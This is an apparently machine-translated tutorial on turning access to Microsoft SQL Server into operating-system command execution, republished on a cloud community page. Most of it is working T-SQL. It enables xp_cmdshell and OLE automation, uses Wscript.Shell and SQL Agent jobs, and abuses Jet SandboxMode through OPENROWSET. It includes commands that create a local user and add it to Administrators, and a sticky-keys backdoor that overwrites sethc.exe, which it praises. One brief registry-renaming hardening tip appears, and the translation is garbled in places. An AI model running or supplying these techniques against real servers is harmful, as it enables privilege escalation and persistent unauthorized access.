A xp_cmdshell EXEC Master.. xp_cmdshell ' ipconfig '
Open xp_cmdshell:
--To allow advanced the options to be changed.
EXEC sp_configure ' show advanced options ', 1
Go
--To update the currently configured value for advanced options.
Reconfigure
Go
--to enable the feature.
EXEC sp_configure ' xp_cmdshell ', 1
Go
--To update the currently configured value of this feature.
Reconfigure
Go
two. sp_OACreate Creating Wscript.Shell Objects
Use master declare @o int exec sp_oacreate ' Wscript.Shell ', @o out exec sp_OAMethod @o, ' run ', null, ' cmd/c ' net user ' > C : \test.tmp '
Creating Scripting.FileSystemObject Objects
DECLARE @o int
exec sp_oacreate ' Scripting.FileSystemObject ', @o out
exec sp_OAMethod @o, ' copyfile ', null, ' C:\windows\explorer.exe ', ' c:\windows\system32\sethc.exe ';
DECLARE @oo int
exec sp_oacreate ' Scripting.FileSystemObject ', @oo out exec sp_OAMethod @oo, ' copyfile ', null, ' c:\windows\system32\ Sethc.exe ', ' c:\windows\system32\dllcache\sethc.exe ';
You can use Utilman.exe instead of sethc.exe to achieve the same effect. The back door is cool, huh?
Creating Shell.Application Objects
DECLARE @o int
exec sp_oacreate ' shell.application ', @o out
exec sp_OAMethod @o, ' ShellExecute ', null, ' cmd.exe ', ' cmd/c net user >c:\test.txt ', ' c:\windows\system32 ', ', 1;
Open OLE Automation procedures
sp_configure ' show advanced options ', 1;
Go
Reconfigure;
Go
sp_configure ' Ole automation procedures ', 1;
Go
Reconfigure;
Go
Our strategy is to get the object done.
Wscript.Shell can invoke the system kernel to run DOS basic commands
This component can be renamed to prevent harm by modifying the registry.
Hkey_classes_root\wscript.shell\
and hkey_classes_root\wscript.shell.1\
Change to a different name, such as: Wscript.shell_changename or Wscript.shell.1_changename
You can call this component normally using this when you call it later.
Also change the CLSID value
Hkey_classes_root\wscript.shell\clsid\ the value of the project
Hkey_classes_root\wscript.shell.1\clsid\ the value of the project
With Wscript.Shell, Scripting.FileSystemObject, shell.application
three. JOB With a job execution command, one of the prerequisites is to open the SQLServerAgent service, and the following statement opens
exec master.dbo.xp_servicecontrol ' start ', ' SQLServerAgent '
Use msdb CREATE TABLE [jncsql] (resulttxt nvarchar (1024) null) EXEC sp_delete_job null, ' x ' exec sp_add_job ' x ' exec
Sp_add_jobstep null, ' x ', null, ' 1 ', ' CmdExec ', ' cmd/c ' net user>c:\test.test ' exec sp_add_jobserver
NULL, ' x ', @ @servername exec sp_start_job ' x ';
Four. SandboxMode (often said on the Internet sandbox mode) Rationale: Invoke the Shell function of the VBS in access to execute any command with system privileges. But before you try this function, you have to open a switch called SandboxMode in the registry.
Registry: Hkey_local_machine\software\micris
Oft\jet\4.0\engine\sandboxmode. The default value is 2, and this person key value of 0 indicates the beginning
Finally disables SandboxMode mode, 1 means to try the SandboxMode mode for a acess application, 2 means to use SandboxMode mode for an Access application, and 3 indicates that the security setting is fully turned on. 1 or 0 can execute the command
EXEC sp_addlinkedserver ' testsql ', ' OLE DB Provider for Jet ', ' microsoft.jet.oledb.4.0 ', ' c:\windows\system32\ias\ Ias.mdb '
EXEC master.. Xp_regwrite ' HKEY_LOCAL_MACHINE ', ' Software\microsoft\jet\4.0\engines ', ' SandboxMode ', ' REG_DWORD ', 1
EXEC Master.. Xp_regread HKEY_LOCAL_MACHINE, ' Software\microsoft\jet\4.0\engines ', ' SandboxMode '
SELECT * FROM OPENROWSET (' microsoft.jet.oledb.4.0 ', ';d atabase=c:\windows\system32\ias\ias.mdb ', ' Select Shell ' (" cmd.exe/c NET user Test Test/add ")"
SELECT * FROM OPENROWSET (' Microsoft.Jet.OLEDB.4.0 ',
';d atabase=c:\windows\system32\ias\ias.mdb ', ' Select shell (' cmd.exe/c net localgroup Administrators Test/add ') '
The following is the system's own two MDB files
C:\WINDOWS\system32\ias\dnary.mdb
C:\WINDOWS\system32\ias\ias.mdb
Summarize
Some of the above methods (take a closer look I have forgotten a few, haha.) You can divergent thinking, and then find out several kinds of things are tested by default, often infiltrated when there are many restrictions, we can overcome each, the use of components to get server information, read, create files, etc., we still have a deep understanding of the phrase permission.
Note
About *.exe c:\windows\system32\ and C:\Windows\System32\Dllcache.
About Cmd.exe and Command.exe.
About Net.exe and Net1.exe.
MDB file does not exist we can upload one.
The component that executes the command is not just one OH
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.
